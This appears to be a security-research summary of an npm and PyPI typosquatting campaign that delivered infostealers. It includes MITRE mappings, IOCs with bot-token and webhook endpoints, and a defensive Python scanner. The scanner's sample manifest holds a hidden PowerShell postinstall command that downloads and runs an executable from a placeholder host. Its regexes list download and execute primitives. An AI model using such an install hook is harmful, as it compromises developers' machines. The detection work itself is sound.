MUT-8694: An NPM and PyPI Malicious Campaign Targeting Windows Users | Datadog Security Labs

Datadog Security Research uncovered a supply-chain campaign distributing infostealer malware via malicious npm and PyPI packages that target developers, especially in the gaming community. The actor used typosquatting and legitimate hosting platforms to deliver payloads and maintain C2 communications. #MUT8694 #SkuldStealer

Key Points

  • Supply-chain campaign observed targeting both npm and PyPI repositories to deliver malicious packages.
  • Threat actor identified as MUT-8694 leveraging typosquatting to impersonate legitimate packages.
  • Malicious packages (e.g., larpexodus on PyPI, nodelogic on npm) execute PowerShell to download and run payloads.
  • Datadog’s GuardDog detection flagged the malicious packages, enabling discovery and response.
  • Malware families involved include Blank Grabber and Skuld Stealer, focused on credential theft and data exfiltration.
  • Researchers identified 42 malicious packages on PyPI and 18 on npm linked to the campaign.
  • Infrastructure includes GitHub raw URLs, Replit-hosted payloads, Telegram bot endpoints, and a Discord webhook for C2 or exfiltration.

MITRE Techniques

  • [T1071] Command and Control – Uses multiple command-and-control domains and web endpoints to maintain communications and exfiltrate data (‘Utilizes multiple command and control domains to maintain communication with compromised systems.’)
  • [T1203] Exploitation for Client Execution – Executes malicious code via crafted package install scripts and PowerShell commands to run downloaded payloads (‘Exploits vulnerabilities in software to execute malicious code.’)
  • [T1003] Credential Dumping – Harvests credentials from the endpoint to enable further access and data theft (‘Collects credentials from the operating system to gain unauthorized access.’)
  • [T1041] Exfiltration Over C2 Channel – Transfers stolen data to external services and C2 endpoints like webhooks and bot APIs (‘Transfers stolen data to an external location.’)
  • [T1027] Obfuscated Files or Information – Uses obfuscation and script techniques to hide malicious behavior and evade detection (‘Uses obfuscation techniques to hide malicious code from detection.’)
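The install-script behaviour described under T1203 (a package lifecycle hook launching PowerShell or cmd.exe to fetch and run a payload) is the kind of pattern a GuardDog-style manifest scan can flag before the package is ever installed. The following is an added example, not code from the Datadog article or from GuardDog: it scans an npm `package.json` for lifecycle hooks that pair a shell launcher with download, decode or execute cues. The regex cue lists and the two sample manifests are constructed for illustration; the URL in the suspicious sample is a placeholder, not an indicator from the campaign.

```python
import json
import re

# npm lifecycle hooks that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Condition 1: the hook launches PowerShell or cmd.exe.
LAUNCHER_RE = re.compile(r"\b(powershell(\.exe)?|pwsh|cmd(\.exe)?)\b", re.I)
# Condition 2: the same command carries a fetch / decode / execute primitive
# or a remote URL. Both conditions together are far less noisy than either alone.
FETCH_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Invoke-Expression|\biex\b"
    r"|DownloadString|DownloadFile|Start-Process|FromBase64String"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|https?://)",
    re.I,
)


def scan_package_json(manifest_text: str) -> list:
    """Return one finding dict per lifecycle hook that matches both conditions.

    An empty list means no hook paired a launcher with a download/run cue;
    `test` and other non-lifecycle scripts are ignored because npm does not
    run them on install.
    """
    manifest = json.loads(manifest_text)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue
        launcher = LAUNCHER_RE.search(command)
        cues = sorted({m.group(0).lower() for m in FETCH_RE.finditer(command)})
        if launcher and cues:
            findings.append({"hook": hook, "launcher": launcher.group(0),
                             "cues": cues, "command": command})
    return findings


# Constructed sample manifests (not real package contents).
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "example-typosquat", "version": "1.0.0",
    "scripts": {"postinstall": 'powershell -w hidden -c "iwr https://payload.invalid/x.exe '
                               '-OutFile $env:TEMP\\x.exe; Start-Process $env:TEMP\\x.exe"'},
})
BENIGN_MANIFEST = json.dumps({
    "name": "example-lib", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/build.js", "test": "jest"},
})

if __name__ == "__main__":
    for finding in scan_package_json(SUSPICIOUS_MANIFEST):
        print(f"[{finding['hook']}] {finding['launcher']} + {finding['cues']}")
    print("benign findings:", scan_package_json(BENIGN_MANIFEST))
```

The same two-condition idea applies to PyPI packages by scanning `setup.py` for `subprocess`/`os.system` calls whose arguments match the launcher and fetch patterns; this block covers only the npm manifest case.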

Indicators of Compromise

  • [File Name] Suspicious binaries used as payloads or droppers – CBLines.exe, RobloxPlayerLauncher.exe
  • [File Name] System utility invoked by installers – cmd.exe (used to run PowerShell/download commands)
  • [URL] Hosted payloads/download locations – https://github[.]com/holdthatcode/e/raw/main/CBLines.exe, https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/skuld (and other Replit-hosted payloads)
  • [URL] Command/exfiltration endpoints – https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getUpdates, https://discord[.]com/api/webhooks/1296197362108338248/k492vQ1I3SDXcmvWcvsy2EcSUzrwhNmILrYhR3qSF8R7tkcE-C5GgZSxuS3IlNschBWg

Read more: https://securitylabs.datadoghq.com/articles/mut-8964-an-npm-and-pypi-malicious-campaign-targeting-windows-users/